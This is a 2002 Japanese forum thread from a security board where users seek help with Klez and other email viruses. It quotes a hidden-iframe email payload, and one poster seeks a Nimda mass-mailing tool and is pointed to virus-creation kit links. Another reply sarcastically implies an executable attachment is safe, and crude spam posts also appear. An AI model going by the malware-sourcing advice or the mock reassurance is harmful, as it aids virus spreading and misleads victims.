また、誰が登録したか特定できる方法があればそれも教えてください。

690 :名無しさん@お腹いっぱい。:02/04/26 02:21
>>689
深読みかもしれないが、質問に見せかけた嫌がらせ?


691 :689:02/04/26 02:23
>>690
ちがうです。
>>668
全く同じものです。
ヤフー絡みでしょうか?

692 :名無しさん@お腹いっぱい。:02/04/26 02:26
>>689
受信禁止リストに入れときなさい。

>>690
だとしてもそんなレスするより答えたほうが文章短いぞ。

693 :名無しさん@お腹いっぱい。 :02/04/26 02:55
<HTML><HEAD></HEAD><BODY>
<iframe src=cid:I9311mMiF height=0 width=0>
</iframe>
<FONT></FONT></BODY></HTML>

とかいうメールが来て、毎回必ずjpgが添付されているんですが。。。
これ見ちゃうとまずいんでしょうか?

694 :643:02/04/26 03:10
>>686
おお、そうなのですか!
わかりました。「EdMaxも危険度はOEと同じ」、肝に銘じて用心します。
レスありがとうございました。

695 :名無しさん@お腹いっぱい。:02/04/26 03:13
receivedの情報がないメールってありますか。


696 :名無しさん@お腹いっぱい。:02/04/26 11:53
ウィルスにかかりました。何か情報を持っている人はください。
原因はまだ追求中なのですが、どうやらブラウザ感染型のような気がします。
症状は以下のようになってます。

1、感染したOS、Windows2000 Pro,Vine Linux2.15
2、感染すると思われるソフトウェア、ネットスケープ4.78、6.0、IE5.5
3、ブラウザを見ているとバックグラウンドが変わったり、エロサイトの画像が貼り付けられる。
4、同じネットワークを使っているPCにも感染されると思われます。
5、Windows2000の場合、ウィルスの感染したユーザのDocumentSetting(名前忘れた)の下に隠しフォルダが作られる。
6、時間が経つとツール、フォルダオプションの設定の隠しディレクトリ、隠しファイルも見える設定にすることができ
ないように書き換えられる。

現在はこんなところです。
どこのウィルス対策サイトを見ても上の症状のようなウィルスはなかなか見つかりません。
つーか、今までウィルスかかる人ってバカと思ってたけど、自分がかかってかなりピンチです。
助けてください。

697 :インターネット=ソープランドのマンコ:02/04/26 12:02
ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

ソープランドを貶める意図はありません。

このくらい言わないと重大さが解らないか?
あんまり車に乗らないし、今まで事故に遭ったこともないし
任意保険は必要ないですよね?と同じ。
ウイルス対策をしないのはチンコにゴムつけないのと同じ。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。

698 :名無しさん@お腹いっぱい。:02/04/26 12:26
>>697
淋、蔵以外のヘルペスやコンジロームなどはゴムじゃ防げません(泣

699 :名無しさん@お腹いっぱい。:02/04/26 17:17
>>697
毎日昼間からソープランド通いご苦労さん

700 :名無しさん@お腹いっぱい。:02/04/26 22:44
>>693
だから何故添付ファイル名を隠す?
助けてほしいのなら可能な限りの情報を提供しろ。助かるものも助からんぞ。

701 :699は淋蔵まみれ!!!!!!!!:02/04/27 00:25
>>699
淋、蔵まみれ
淋、蔵まみれ
淋、蔵まみれ
淋、蔵まみれ
淋、蔵まみれ

702 :名無しさん@お腹いっぱい。:02/04/27 01:05
コンジロームをゴムで防げたらそれは凄いだろ。

703 :名無しさん@お腹いっぱい。:02/04/27 01:33
初めてセキュリティ板にきた初心者です。
なんかメールがきて
ヤフー評価のtxtと一緒に送られてきたため
ちょっと油断して付属のpifファイルも開けてしまったら
30秒おきにHDDがガリガリいうようになってしまいました。
PCクリーン2000でHDDチェックをしても異常なしなのですが、、、、、、。
なぜか再起動するたびにPCクリーンを起動させようとすると
PCクリーンのCDを要求するようになりました。
再インストールしかないでしょうか?


704 :名無しさん@お腹いっぱい。:02/04/27 01:44
今日の昼
「Hi,This is a new game
 This game is my first work.
 You're the first player.
 I expect you would like it. 」
ってメールが二つ、別々のアドレスから届いたんだが、
これはやっぱりウイルスですかねぇ?

705 :名無しさん@お腹いっぱい。:02/04/27 01:46
>>703
複数の疑問を一気に投げつけないでくれ。こういうときに慌てると
ロクな事が無いぞ。

取り敢えず、30 秒おきにHDDアクセスするのは治ったのか?
それと、PCクリーンってのは知らないけど、CD要求する時のメッセージの内容は?
あと、スタートメニューから msconfig って入力して、「スタートアップ」の所を見てみそ。

706 :名無しさん@お腹いっぱい。:02/04/27 01:46
>>704
どー考えてもそうなるでしょ。

707 :名無しさん@お腹いっぱい。:02/04/27 01:54
>>705
レスありがとうございます。
PCクリーンはウイルスバスターの英語版で
マザーのオマケソフトで入ってたものです。
HDDガリガリは直っていません。
スタートアップのところを見ましたがよくわからないです。
怪しげなのは、nwiz.exe/install MK9973.exe です。
それと接続ログをみると
honkong.comなど得体の知れないのがたくさんでています。

708 :704:02/04/27 01:57
とりあえず消しときました。


709 :名無しさん@お腹いっぱい。:02/04/27 02:05
>>707
Cドライブ全部を対象に、nwiz.exe ってのを検索して、どこのフォルダにあるのかを教えて。
スタートアップにあるものとしては何か変だと思う。

710 :名無しさん@お腹いっぱい。:02/04/27 02:15
>>709
検索したら
geforceのドライバー関連みたいです。
2つともチェックはずしたらXPが起動しなくなりました。
復旧できましたけど。
ガリガリは相変わらずです、、、、。
ウイルスメールのあてみたらdrica.comです。
ドリキャスから送られてきたみたい。

711 :名無しさん@お腹いっぱい。:02/04/27 02:22
>>710
訳わからないうちに外さないの。復旧できたならいいけど。

次。
・Ctrl + Alt + Del でタスクマネージャーを出して、一つずつ強制終了する。
(Windows 再起動直後にやること)
で、その都度 1 分ほど様子を見て、HDD アクセスが起きるか見守る。
HDD アクセスを引き起こしているソフトの招待を見極める。

下手に殺すと Windows ごと死ぬので面倒だけど。
それと、PC クリーンを再インストールした後で Windows 再起動するとど
うなる?

712 :名無しさん@お腹いっぱい。:02/04/27 02:30
それと、>>707
>それと接続ログをみると
の、接続ログって何の事を言っている?IEとか?あるいはルーターのログ?

713 :名無しさん@お腹いっぱい。:02/04/27 02:33
ルーターのログです。
普段ならCtrl + Alt + Del でタスクマネージャーがでてくるんだけど
数回の1回ぐらいしかでてこなくて、でてきてもすぐにキャンセルさせられます。



714 :もうだめぽ、、。:02/04/27 02:37
再インストールしかないかも、、、。
メールの宛名がwelocom to my town だったし
用心しつつも好奇心で開けた自分が馬鹿でした。


715 :名無しさん@お腹いっぱい。:02/04/27 02:41
>>714
再インストしても全然困らないのならそれをお薦めするが・・・。
困るならもう一日くらいここで待ってるほうがいい。
漏れでは力不足だが、19:00 位からもっと詳しい人も顔出すから。

716 :名無しさん@お腹いっぱい。:02/04/27 02:44
想像だけど、多分ウィルスじゃなくてスパイウェアかなにかが
PC を乗っ取ってるっぽい。勝手に外部接続する辺りが。
PC クリーンもそいつが消したんだろう。
つまり、メチャクチャ危険な状態だと思うが。

717 :もうだめぽ、、。:02/04/27 02:45
さっきAD-WAREで検索かけたけどなにもひっかかってませんでした。

718 :名無しさん@お腹いっぱい。:02/04/27 02:47
>>717
ウィルスバスターとかのオンラインスキャンは?
URL はこのスレ検索すれば引っかかるよ。

719 :名無しさん@お腹いっぱい。:02/04/27 02:51
それと、セーフモードで起動しても HDD アクセスは起きる?

720 :もうだめぽ、、。:02/04/27 03:07
オンラインスキャンででました。
WALM、KLZGが8ファイル
明日バスター最新版買って来ます。


721 :もうだめぽ、、。:02/04/27 03:10
まだスキャン中ですが
WOLM.KLEZ.Gです
10ファイルに増えてます。

722 :名無しさん@お腹いっぱい。:02/04/27 03:15
もうどっかんどっかんだな

723 : :02/04/27 03:18
あきらめたほうがいいって。
モノによっては感染したままネットに繋いでたら
バラ撒くことにもなりかねないぞ。

724 :名無しさん@お腹いっぱい。:02/04/27 03:18
まぁ、原因は分かったにゃ。
というか、KLEZ あるって分かったんなら回線切ること。
バスター買ってきて HD 全検索 & 駆除 or 削除するまではネットに
繋がないように。加害者になっちゃうよ。

725 :名無しさん@お腹いっぱい。:02/04/27 03:20
というか、もしかして漏れを含めて ROM してた人結構いる?
マンツーマンでごちゃごちゃやってたようにみえたが。

726 : :02/04/27 03:26
うむ

727 :名無しさん@お腹いっぱい。:02/04/27 03:39
これ開いても大丈夫ですか?

This is a humour game
This game is my first work.
You're the first player.
I wish you would like it.
添付ファイル

rock.exe (90KByte)
rover0[1].jpg (5KByte)




728 :名無しさん@お腹いっぱい。:02/04/27 03:43
なぜ人に聞く?

729 :名無しさん@お腹いっぱい。:02/04/27 03:43
>>727
ウィルスに感染して PC が大変なことになるだけでその他は全然平気。

730 :727:02/04/27 03:45
そうなの?ありがと!!

731 :もうだめぽ、、、。:02/04/27 04:37
HDDフォーマットしてOS再インストールしてきました。
初アクチしてこなきゃ。

732 :名無しさん@お腹いっぱい。:02/04/27 10:58
ウイルス感染しました
駆除できないので
悲しいです
どうしたらいいですか
泣きそうです


733 :名無しさん@お腹いっぱい。:02/04/27 11:12
>>732 泣け。
涙が涸れたらアンチウィルス買って来る、OSクリアインストール、アンチウィルスインストール。


734 :もうだめぽ、、、。:02/04/27 11:35
早速、ノートンセキュリティ買って、入れました。
7800円は勉強料だと考えます。
OS認証電話しなくても、ネット認証だけで通りました

735 :名無しさん@お腹いっぱい。:02/04/27 12:14
>>734
XPのアクチは基本的にはネットだけでやるものだよ。
電話認証はネットが使えない人用。

736 :電話認証経験者:02/04/27 13:52
OFFICE XPだけど、
6桁の数字が、A〜Gの7種類ある。
つまり、42の数字をTELで聞いて、入力しなければならない。
口調は、やわらかいが、しつこく原因を追究された。
24時間体制であった。
マイクロソフトの社員も、かわいそうかもしれない。



737 :名無しさん@お腹いっぱい。:02/04/27 14:16
>>736
アクチの対応要員なんて社員じゃなくてどっかに外注してるだろ。

738 :名無しさん@お腹いっぱい。:02/04/27 15:28
怪しいメールがきて
Windows Media Playerが勝手に開いたんですけど
これってウイルスですか?
添付ファイルは開かずに捨てましたけど

739 :名無しさん@お腹いっぱい。:02/04/27 16:07
>>738
Windows Media Playerが起動したってことは感染したってことだ。
パソコンが動いているうちに売っぱらった方がいいと思うけど。
どうせ他のいろんなウィルスにも感染してるだろうし。

740 :670:02/04/28 00:48
件名が「Undelivered Mail Returnd to Sender」
というメールがずっときているんですが、
これって私が感染しているウイルスを送っているということなんでしょうか?

プロパティから分かるのはこんな感じなんですが。

Received: from Mlenyxda (Cicnm4DS38.aic.mesh.ad.jp [211.135.134.61])
by 私の送信サーバ
for <メールアドレス1>; Thu, 25 Apr 2002 22:02:40 +0900 (JST)
From: ontake <メールアドレス2>
To: メールアドレス1
Subject: Japanese girl VS playboy
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=WKt6823xq0mi999P7PZ14DK93s9
Message-Id: <私のサーバ情報>
Date: Thu, 25 Apr 2002 22:02:40 +0900 (JST)

どなたか教えて下さい。

741 :名無しさん@お腹いっぱい。:02/04/28 00:48
すみません、常駐板のクッキー残してました。

742 :名無しさん@お腹いっぱい。:02/04/28 00:52
>>740
差出人名を偽装しているウィルスの可能性もある。最近多い。
先ずはウィルススキャンして見ぃ。
ウィルスバスターとかもってないなら Web のオンラインスキャン。URL
はスレの前に方に書いてある。

743 :名無しさん@お腹いっぱい。:02/04/28 00:57
>>740
つか、
>件名が「Undelivered Mail Returnd to Sender」
って言ってるのと
>Subject: Japanese girl VS playboy
って言ってるのがめっさ矛盾してるんだが、本当はどっちだ?

744 :名無しさん@お腹いっぱい:02/04/28 01:00
ZONEALARM(無料)とAVG(無料)入れるだけで、セキュリティーが飛躍的に増します。
両方日本語パッチあります。

これ以上に、使えるソフトあれば教えて下さい。

745 :名無しさん@お腹いっぱい。:02/04/28 01:07
>>744
ZoneAlarm Pro と AVG(有料版)

746 :名無しさん@お腹いっぱい。:02/04/28 01:11
>>745
もっともだ

無料のものに比べればある程度のソフトは使える

747 :名無しさん@お腹いっぱい。:02/04/28 01:34
セキュリティ固めるのが本来の目的であるのだから、「無料で」とか
意味のない条件が付くのはおかしい。有料のソフトは有料なりの、
無料のソフトは無料なりの理由と性能差がある。
ただ、F/Wはシマンテックとかトレンドマイクロのものより Zone の無料
の物のほうが使い勝手も性能もいい。ただ、個人的には Outpost Firewall
の方が好き。

748 :740:02/04/28 01:35
>>743
件名は私の元へリターンで戻ってきてしまったメーラーで表示されているもので、
Subject:はプロパティを開けた中に書きこまれていた情報です。

友人の元などにはウイルスが届いてはいないと聞きました。
まずはウイルススキャンしてきます。


749 :名無しさん@お腹いっぱい。:02/04/28 02:29
>>746
おれ、ZAやめてOutPostにしたが
広告消しとかプラグインがついててお徳♪

750 :名無しさん@お腹いっぱい。:02/04/28 09:37
ここ数日に届いたウイルスらしきメールの件名

A funny website
A IE 6.0 patch
A powful tool
A special excite game
A special powful tool
A WinXP patch
Collection
END XXXCOUNTER.COM CODE
Fw:eager to see you
Fw:meeting notice
For the other parameters
Honey
LANGUAGE
LeftMargin
Notification:Hi,spice girls' vocal concert
Rights reserved.
Some questions
Sos!
Spice girls' vocal concert
TopMargin

以下の3つは〇〇の部分が当方のアカウント名

Fw:〇〇,please try again
Hello,〇〇,the Garden of Eden
Hi,〇〇,honey


751 :名無しさん@お腹いっぱい。:02/04/28 16:28
>>750
悪いことは言わんが、メールアドレス変えたらどうだ?
いずれ防ぎきれなくなるぞ。

752 :名無しさん@お腹いっぱい。:02/04/28 17:27
>>751
アリガト。
WEBメールのアドだから捨てます。

753 :cheshire-cat:02/04/28 17:29
>>752
気になってたんだけど。
下3つの件名、アカウントってメルの?

754 :名無しさん@お腹いっぱい。:02/04/28 18:17
友達から「Scrolling」って件名で「.scr」の拡張子の添付ファイルが
ついたメールが来ました。とりあえず開かず(プレビューOFFです)
削除しました。
やっぱりこれもウィルスですかね?なんて種類なんでしょうか。

755 :名無しさん@お腹いっぱい。:02/04/28 18:43
>>753
うん。そうだよー
アカウントって言うんだよね?@マークより前の部分。

それと1通、送信者が【私自身の別のメアド】ってのもあったよー

756 :名無しさん@お腹いっぱい。:02/04/28 18:46
>>754
ウィルススキャンしろ。http://www.trendmicro.co.jp/hcall/
件名や拡張子だけでわかる時代じゃなくなった。

757 :名無しさん@お腹いっぱい。:02/04/28 18:59
>>754
大まかな意見は >>756 と同じだが、
>やっぱりこれもウィルスですかね?
なんて呑気な事言ってる場合じゃないだろ。どう考えてもめっさウィルスだぁ。

758 :名無しさん@お腹いっぱい。:02/04/28 19:02
思うんだけど、ウイルスらしきメールを受け取って、怪しいからって
ワクチンベンダーのページへ調べに行かずに、真っ先に
「2ちゃんねる」に聞きに来る人たちって(以下自粛)

759 :名無しさん@お腹いっぱい。:02/04/28 19:05
「2ちゃんねる」はワクチンベンダーよりも信頼があるんだねぇ(w

760 :754:02/04/28 19:21
拾ったノートンでスキャンしたら感染してませんでした。
やっぱりプレビューOFFは重要ですね。

>どう考えてもめっさウィルスだぁ
俺もそう思ったんですけどね・・・

>真っ先に「2ちゃんねる」に聞きに来る人たちって
まさにその通りです・・・申し訳ないです。
多分こういう風潮ってウィルスに限らないんでしょうね。

761 :名無しさん@お腹いっぱい。:02/04/28 19:22
それと、ウイルス感染者が泣きついてくるような板に、他人のメルアド
書くやつ。

感染者がこの板見たら、そのアドレスにウイルスが送られるんだぜ!
確信犯もいるみたいだが。


762 :名無しさん@お腹いっぱい。:02/04/28 19:24
>>760 落ちてるノートンは感染しているかも。
そんな事に気づかない>>754は救いがたいアフォ

763 :cheshire-cat:02/04/28 21:08
>>755
そっかー、それって初耳状態。
それと、正確にはこの場合、アカウントって用語が正しいのかどうかは知らんっす。漏れヘタレなんで。

どうでもいいんだが。
KLEZ系はスプレッダー(変種製造者みたいなヤシ)がたくさんいるようだが。
Nimdaで件名とか本文変えてvilliメル送信するツール、ずーーーーーっと探してるけど、見つからん。

764 :名無しさん@お腹いっぱい。:02/04/28 21:57
>>755
アカウント名と表現するのが正しい

765 :スパマー潰し!!!!!!!:02/04/29 00:12
 From: vlnfi5wm9@yahoo.com
Reply-To: basiliaaxt547@swirve.com
To: jab1@bounce.2np.net jab1@ns2.2np.net wkh3bew@mail.qves.net
ticsmnt@mx1.1premio.com
Subject:Expand Your Business
Date**
Received:from[216.155.40.29] by 2np.net with SMTP id **
Received:from[207.253.250.43](yahoo.co.uk)
by a-b-c.com (CommuniGate Pro SMTP 1.2.3) with SMTP id **
From vlnfi5wm9@yahoo.com
X-Mailer:KMail[version 1.2]
Message-ID:< basiliaaxt547_swirve.com@a-b-c.com >

VISA - Master Card - American Express
Retail or online, big or small,
we provide businesses of all types an opportunity to have their own no hassle Credit Card
Merchant Account with NO setup fees. Good credit, bad credit, no credit -- not a problem! 95% approval rate!

Make your business grow by giving your customers an easy and secure method of paying for your products or services.
With a merchant account not only will you be able to handle credit cards, but as well as debit cards,
ATM and check guarantee services. You will have the ability to accept E-checks over the Internet with a secure server.
To ensure that you won't miss a sale, you will be able to accept checks by Phone or Fax. We can handle ANY business and client type!

No Setup Fees - Low Monthly Cost
To learn more about this offer, please fill out the form below. There are no costs or obligations involved.
One of our staff will contact you within 5-10 business days and will answer any questions you may have.

For mailing list removal please reply with the word 'Remove' in the subject line of the email.
We apologize for any inconveniences.

766 :名無しさん@お腹いっぱい。:02/04/29 00:24
発信者:
次のもの返答へのvlnfi5wm9@yahoo.com:
次のものへのbasiliaaxt547@swirve.com:
jab1@bounce.2np.net jab1@ns2.2np.net wkh3bew@、mail.qves.net ticsmnt@mx1.1premio.com主題:
受け取られたあなたのビジネスDate**を拡張します:
SMTPを備えた2np.netによる[216.155.40.29]から、id**は次のものを受け取りました:
vlnfi5wm9@yahoo.com X-メイラーからのSMTP id**を備えた-b-c.com(CommuniGate賛成論SMTP 1.2.3)による[207.253.250.43](yahoo.co.uk)から:
KMail[バージョン1.2]メッセージ-ID:<basiliaaxt547_swirve.com@-b-c.com>
VISA(マスター・カード)アメリカン・エキスプレス小売り、あるいはオンラインか大きいか、小さな、私たちは、すべてのビジネスを提供します、
彼らのものを持つ機会をタイプする、NOセット・アップ料金を備えた激論クレジットカード商人アカウントはない。
よい信用、悪い信用(信用なし)――ない、問題!
95%の承認割合!
あなたの製品あるいはサービスの代価を払う容易で安全な方法をあなたの顧客に与えることによりあなたのビジネスを成長させてください。
商人アカウントで、だけでなく、でしょう、あなた、クレジットカードを扱うことができること、しかし支払カード(ATMとチェックの保証サービス)と同様に。
安全なサーバーとインターネット上のE-チェックを受理する能力を持つでしょう。
販売を逃さないだろうということを保証するために、電話またはファックスによるチェックを受理することができるでしょう。
私たちはANYビジネスおよびクライアント・タイプを扱うことができます!
セット・アップ料金はない、この提示に関してもっと学習する低く毎月のコスト、用紙に下に記入してください。
コストまたは義務が複雑ではありません。
私たちのスタッフのうちの一人は5-10日の営業日内にあなたと連絡をとり、持っているかもしれないというどんな疑問にも答えるでしょう。
メーリング・リスト削除のために、単語で返答してください「移動する」電子メールの主題ラインで。
私たちは任意の不便に対して謝罪します。


767 :インターネット=ソープランドのマンコ:02/04/29 00:57
ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

ソープランドを貶める意図はありません。

このくらい言わないと重大さが解らないか?
あんまり車に乗らないし、今まで事故に遭ったこともないし
任意保険は必要ないですよね?と同じ。
ウイルス対策をしないのはチンコにゴムつけないのと同じ。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。

768 :名無しさん@お腹いっぱい。:02/04/29 01:04
>>758-759
たまには嘘を教えてあげてはいかがでしょうか?

769 :名無しさん@お腹いっぱい。:02/04/29 01:52
>>767 相変わらず低脳だな

770 :相変わらず低脳だな :02/04/29 02:14
>>769
カンジダ症 クリプトコッカス症 クリプトスポリジウム症 サイトメガロウィルス感染症
単純ヘルペスウィルス感染症 カポジ肉腫 原発性脳リンパ腫リンパ性間質性肺炎
非定型抗酸菌症 カリニ肺炎 進行性多発性白質脳症 トキソプラズマ脳症 化膿性細菌感染症
コクシジオイド真菌症 エイズ脳症 ヒトプラズマ症 イソスポラ症 非ホジキンリンパ腫
活動性結核 サルモネラ菌血症 HIV消耗性症候群 反復性肺炎 浸潤性子宮頸ガン

771 :763へ:02/04/29 02:26
ウイルス作成ソフト
Virus Creation Tools (54)
http://vx.netlux.org/dat/vct.shtml
http://vx.netlux.org/bin.shtml

↑↑↑↑↑ここにないか?

772 :名無しさん@お腹いっぱい。:02/04/29 02:29
zipファイルをノートンでスキャンしたところ
『ブートレコードに変更がありました』
という警告が出ました。
果たしてスキャンしただけで感染するんでしょうか?
もちろん復元しましたが欝になりました。

773 :名無しさん@お腹いっぱい。:02/04/29 06:16
友人から、私のhotmailのアカウントでウイルスらしいものが送られてきたとのことで、
友人いわく、
> From: 私の名前<私のメアド@hotmail.com>
> Date: 2002/04/28 Sun AM 09:20:19 JST
> To: 相手のメアド
> Subject: A very humour game
>
>Hello,This is a humour game
>This game is my first work.
>You're the first player.
>I hope you would enjoy it.

という内容のメールとともに、kitty.exeとjpgファイルが添付されていたそうです。
いま、オンラインウイルスチェックをかけていますが、実際のところ、hotmailでウイルスに感染する
ことはあるのでしょうか?
ちなみに自宅のメーラーはbecky!を使っています。メールサーバは自動でウイルスを除去する設定の
ようです。

774 :773:02/04/29 06:23
追記です。
自宅のPCではノートンのアンチウイルスとウイルススキャンを使っています。
定義ファイルは導入に数日の遅れがあったものの、最新のものでした。

775 :名無しさん@お腹いっぱい。:02/04/29 06:36
偽装されてんだから、鯖がウィルス除去機能を持っていようが
いまいが関係ない。どこからでも届く。

776 :773:02/04/29 12:38
>>775
やはり偽装でしたか。ウイルス情報で検索してもそれらしきウイルス名は
発見できなかったので、まさかとは思いましたが。
さきほどオンラインチェックしたところ、感染していませんでした。
レスありがとうございました。

777 :名無しさん@お腹いっぱい。:02/04/29 17:42
2日間で8通のウイルスらしきメールが送られてきました。
Macでも感染しますか?

778 :名無しさん@お腹いっぱい。:02/04/29 18:09
>>776
subjectからして思いっきりklezですが。

>>777
ものと場合によっては感染する。

779 :民族衣装:02/04/29 18:27
http://tmp.2ch.net/test/read.cgi/kitchen/1020070695/l50

780 :名無しさん@お腹いっぱい。:02/04/29 18:53
>>779
すげぇ・・・

781 :名無しさん@お腹いっぱい。:02/04/29 19:07
すいません。ノートンアンチウィルスを使っていますが、
今、ウィルススキャンをしたところ、
「ブートレコードが変わりました。」と警告ダイアログが出んですけど、
フロッピーディスクの方だとすれば、今日FDを使ったのですけど、
それが原因で誤認だと考えられるのでしょうか?助けてください。

782 :cheshire-cat:02/04/29 19:38
>>781
IEのパッチ当てたとか。

気になるなら、「保存していたブートレコードから修復する(だったっけ?)」で復元。
あと、電源をいきなりカットしたりすると、その表示が出たりもする。

783 :よろしくお願いします:02/04/29 19:42
失礼します。

http://www.sls1.gq.nu/menu.htm
を開いてしまったところ、

「ハードディスクをフォーマットしています... ○○% 完了しました」
等と表示されました。
(○○という所は段々と数字が大きくなっていっていました。10%の辺りでウィンドウを閉めました)

泥縄ですが、ブラクラチェッカ(http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi)
で上記URLをチェックしソースを確認してみましたが、

fakeformatという名前から見ると大丈夫そうにも思うのですが
javaに関して分からないのでご質問します。

今エクスプローラで見ると、HDDの空きが約1Gとなっています。
20Gのハードディスクなので10%とすれば2Gにはなるというのと、
今のところこれといってPCに異常は無いようなので
その意味でも自分では(希望的観測も含めて)大丈夫な気がするのですが

識者のご意見を伺いたく思います。
このPCは大丈夫でしょうか?
どうぞよろしくお願いします。

784 :cheshire-cat:02/04/29 19:46
>>783
ただの悪戯みたいなものかと。
もし本当にフォーマットされたなら、今ここで書き込めないっしょ。

785 :cheshire-cat:02/04/29 19:49
>>783
というか。
JavaScript全開って事自体が問題だと思うが。

786 :よろしくお願いします:02/04/29 19:58
>>cheshire-catさん

やはり悪戯みたいなものですか。
その言葉でほっとしました。良かった〜。

以後気をつけることにします。
アドバイスどうもありがとうございました。

787 :cheshire-cat:02/04/29 20:04
>>786
いいからさ、ブラウザの設定からActive XとJava Scriptを切れ、早く。
オンラインショッピングとWindows Update以外では使わんぞ、漏れ。

788 :名無しさん@お腹いっぱい。:02/04/29 20:08
anyzoo って対処法ガイシュツですか?

789 :快適:02/04/29 20:13
>>786
Active XとJava Scriptが必要で、かつ安全なことがわかっているサイトは信頼済み
サイトに登録しておけば簡単でいいよ。ついでに信頼済みサイトのセキュリティレベ
ルを中に、インターネットを高にそれぞれあげとくのがお勧め。うっとうしい広告窓も
出なくなるよ。

790 :よろしくお願いします:02/04/29 20:16
でも
スクリプトって所の3つ全てを「ダイアログを表示する」
にすると、
このスレッドを表示するのにも毎回ダイアログが出てくるんですが。。。

何か間違ってるんでしょうか。

791 :よろしくお願いします:02/04/29 20:17
すみません。
790は、789を読む前に書き込んだものです

792 :名無しさん@お腹いっぱい。:02/04/29 20:22
>>790
いっそ無効でいいんじゃない。

793 :cheshire-cat:02/04/29 20:25
>>789
漏れは疑い深いんで、もし罠あったらやだから、毎回設定しなおしている。
面倒だけど。

794 :よろしくお願いします:02/04/29 20:35
>>792さん
無効だとちゃんと表示されないページが多くないですか?
自分も切っておけるんならそうしたいですが。

789さんの書かれてる方法をやってみようかと思ってます。

795 :789:02/04/29 21:25
>>793
ああ確かに!Active X、Java Script、クッキーの有効・無効が表示されるタブブラウザ
(MDIBrowser)使ってるけど勝手に有効に切り替えちゃうページがあった。

それ以来ちょくちょく無効になっているのを確認するようになった。(もっともエロサイト
だからいかなきゃいいんだけど)

796 :789:02/04/29 21:26
>>794
ごめん789=792です

797 :ところで:02/04/29 22:44
KlezにくっついてくるJPG見た人いる?

798 :名無しさん@お腹いっぱい。:02/04/30 00:46
>>797
見まくってるよー
微妙に笑えるのがたくさんある
貼り付け掲示板作ってくれたら貼るよ
タグ使わないで良いヤツお願い。

799 :名無しさん@お腹いっぱい。:02/04/30 00:56
あのすいません。PC初心者なのですが、アダルトサイトに
アクセスして変なところにダイヤルされる手口あるじゃないですか。
それで、僕はADSLだから電話につながることはなくよかった
のですが、ダイヤルアップ接続のファイルにあるそのアイコンを
削除することができないのですが、どうしたら、消えるのでしょうか?
ご存知の方いらっしゃいましたら、教えてください.
お願いします.

800 :ところで:02/04/30 01:05
>>798
俺が見たのは日本人のだった。
どっかで見かけたような女の剃毛後の画。
それ見てKlezって日本で作られたのかな〜っと思ったんだけど、
他にも色々あるのかな?

801 :名無しさん@お腹いっぱい。:02/04/30 01:26
このHPの解説キボウ!!
http://php.offshoreclicks.com/protect.php


802 :798:02/04/30 01:26
>>800
エロ画像の割合が結構多いけど、他にも色々あるよー
壁紙に出来るきれいな画像もあったし、高そうなワインの
ラベルとかもあった。

803 :名無しさん@お腹いっぱい。:02/04/30 10:23
Klezアップローダー出来たんで、
面白いKlez画像やKlezファイルが来たら、どんどん貼って。

http://cgi-bin.spaceports.com/~klez/index.html




804 :名無しさん@お腹いっぱい。:02/04/30 11:23
>>799
アイコン削除できない?
うちも昨日、ダンナが馬鹿だからエロサイトクリックして
そんなんなったけど、削除できたよ。
んで最終的に「マイコンピュータ」の「ダイヤルアップネットワーク」内の
エロサイトのアイコンを削除した。(Win98)
そのことじゃないのかなー?

805 : :02/04/30 11:32
>>799
アイコンを右クリックでプロパティ見たら?
読取専用になってたりしない?

806 :803:02/04/30 21:41
>798 >800
おまえら!アップローダー作ったんだから貼ってくださいよ!
楽しみにしてるんだから、おながいしますよ!!ヽ(`Д´)ノ

807 :名無しさん@お腹いっぱい。:02/04/30 22:04
パソコンとケータイの両方で同じメーリングリストに入っています。
メーリングリストの参加者からパソコンの方に同じメールが60通以上
延々と送られてきて(サイズはバラバラ)、開いたり消したりしてた直後に
その他の送信者(友人など)からのメールも同じものが何通も来るように
なってしまったのですが、今流行っているウィルスで該当するものは
ありますか?(ケータイにも大量に来たので私のプロバイダ云々の問題
ではないと思います)

808 :名無しさん@お腹いっぱい。:02/04/30 22:10
流行のウィルスはスレッド一覧を順に眺めれば分かると思うが、
その文章からはメールを送るウィルスとしか分かりません。

809 :名無しさん@お腹いっぱい。:02/04/30 22:12
>>807
ウイルスチェックすればわかるのでは?

810 :名無しさん@お腹いっぱい。:02/04/30 22:14
パソコンとケータイの両方で同じメーリングリストに入っています。
メーリングリストの参加者からパソコンの方に同じメールが60通以上
延々と送られてきて(サイズはバラバラ)、開いたり消したりしてた直後に
その他の送信者(友人など)からのメールも同じものが何通も来るように
なってしまったのですが、今流行っているウィルスで該当するものは
ありますか?(ケータイにも大量に来たので私のプロバイダ云々の問題
ではないと思います)

811 :名無しさん@お腹いっぱい。:02/04/30 22:15
2重カキコすみません。


812 :cheshire-cat:02/04/30 22:20
>>807
状況がよくわからんのですが。
メーラーの設定で、「プロバの鯖にメールを残す」、にしとりますか?

813 :名無しさん@お腹いっぱい。:02/04/30 22:34
えっとですね、最初に感染源かな〜と思われるメールが
60通〜(エンドレスに)来て、それから、
こんな感じに↓複数の重複メールを無限に受信しています。
「ひさしぶり〜」 送信者A
「ひさしぶり〜」 送信者A
「ひさしぶり〜」 送信者A
Re:明日の食事会について 送信者B
Re:明日の食事会について 送信者B
Re:明日の食事会について 送信者B
図書館からのお知らせ 図書館
